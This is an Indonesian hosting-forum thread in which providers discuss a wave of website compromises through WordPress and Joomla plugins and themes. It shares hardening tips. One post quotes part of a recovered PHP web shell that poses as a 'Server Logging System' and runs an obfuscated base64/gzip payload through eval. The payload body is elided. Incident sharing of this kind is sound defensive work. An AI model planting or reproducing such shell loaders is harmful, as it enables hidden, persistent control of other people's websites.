web murah-banget.com kena hacker by bogel pontianak

[pakdehosting]

semoga cepat selesai webnya ...

Harap hati hati dalam penggunaan plug in..

 

[galuh82]

mas galuh dr web klien mas yg kena dr log nya masih ada kah?

dari beberapa log yang saya lihat tidak banyak membantu, namun beberapa file yang digunakan sudah saya copy. yang aneh masih ada beberapa fungsi yang sudah didisable tapi ketika dicoba script masih bisa runing misalnya eval dll

//
// devilzShell <

>
// ^^^^^^^^^^^^
// author: HeriNHT
// greets: All Hacker Whitehat
//
//
// ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
// Jayalah Indonesiaku


$shell_name = "Voldemort Shell";
$shell_fake_name = "Server Logging System";
$shell_title = " :: ".$shell_name." ::";
$shell_version = "v1";
 
...
...

@set_time_limit(0);eval("?>".gzuncompress(base64_decode($shell_code)));[/QUOTE]

 

[tokohosting]

sama nih.. klien juga ada yang kena deface.. di obrak abrik template wordpressnya... hmm

 

[IIXPLANET]

wah sudah 3 provider yg kena yach

 

[rendy]

wah sudah 3 provider yg kena yach

dari wordpress sama joomla masuknya

 

[IIXPLANET]

dari wordpress sama joomla masuknya

belum ada info dr plugin apa tepatnya ya sob dr cms tersebut

 

[rendy]

belum ada info dr plugin apa tepatnya ya sob dr cms tersebut

yang udah ketauan masuk dari footer themes

 

[Adhie]

kalaw masalah theme kayaknya sama kayak http://nginxcp.com/

web utamanya 1 server dengan web client?

 

[martin]

biasanya orang setelah berhasil nge-hack kayak gitu yang di ambil apanya sih ? Apa cuma iseng-iseng nge-hack website orang doank?

 

[indonic]

klo ga salah bogel itu memanfaatkan kelemahan plugin thimthumb yg ada di wp dan joomla...dan melakukan override php.ini. dan jumping user. pastikan saja tuk hoster php.ini tidak dapat di override...ada sedikit referensi apabila menggunakan suPHP tuk force default php.ini ke all user: hxxp: // forums .cpanel . net/f185/how-can-i-protect-php-ini-suphp-127537-p2.html